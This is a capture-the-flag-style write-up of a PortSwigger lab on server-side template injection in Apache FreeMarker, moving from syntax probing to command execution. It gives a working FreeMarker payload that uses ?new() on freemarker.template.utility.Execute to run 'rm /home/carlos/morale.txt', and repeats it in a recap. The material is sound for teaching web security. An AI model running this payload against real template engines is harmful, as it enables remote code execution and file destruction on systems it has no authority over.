[This lab](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation) illustrates a realistic **black-box SSTI discovery scenario** where the vulnerability isn’t directly named. Instead, you’re encouraged to explore the template syntax, use documentation, and reason through an exploit path — just like a real-world pentest. The lab uses **Apache FreeMarker**, a Java-based template engine commonly used in CMS and e-commerce systems. Through manual testing and reference to the official documentation, we escalate from basic expression rendering to full **arbitrary code execution via object instantiation**. --- ##### Step-by-Step Exploitation ###### 1. Log in and Find Editable Template Log in using: ``` Username: content-manager Password: C0nt3ntM4n4g3r ``` - Navigate to the admin panel or product editor - Edit one of the product description **templates** ###### 2. Probe for Template Syntax Insert a test expression: ``` ${7*7} ``` Or cause a reference error: ``` ${doesnotexist} ``` You’ll see either: - **Rendered result** (e.g. `49`) - **A template error mentioning FreeMarker** This confirms the use of **FreeMarker** and that **user-controlled expressions are parsed server-side**. ![[CleanShot 2025-05-05 at 13.27.34.png]] --- ##### 3. Identify Exploitation Path from Docs From the [FreeMarker documentation](https://freemarker.apache.org/docs/index.html): - Go to the **"Built-ins reference"** - Find `?new` (object instantiation built-in) - Docs say it's **dangerous** and should be disabled in production - It allows instantiating **any Java class** that implements `TemplateModel` From the [JavaDoc for TemplateModel](https://freemarker.apache.org/docs/api/freemarker/template/TemplateModel.html): - Under “**All Known Implementing Classes**” - Find: `freemarker.template.utility.Execute` This utility allows executing system commands. --- ##### 4. Construct Payload Using `Execute` FreeMarker payload format: ```freemarker <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("COMMAND") } ``` Replace `COMMAND` with the file deletion command: ```freemarker rm /home/carlos/morale.txt ``` Full payload: ``` <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") } ``` --- ##### 5. Replace Template and Trigger - Remove any broken test syntax - Paste in your exploit payload - Save the template - Visit the product page to render the template **If successful**, the `rm` command is executed and the lab is marked **Solved**. --- ##### Why it works? - FreeMarker allows dynamic object creation with `?new()` when misconfigured - `freemarker.template.utility.Execute` provides a direct method to invoke shell commands - The vulnerability exists because user input is trusted inside a **parsed template file** --- ##### Payload Recap ```freemarker <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") } ``` - `<#assign>`: assigns a variable - `?new()`: instantiates the Java class - `${ ex("...") }`: invokes the `Execute` object with a shell command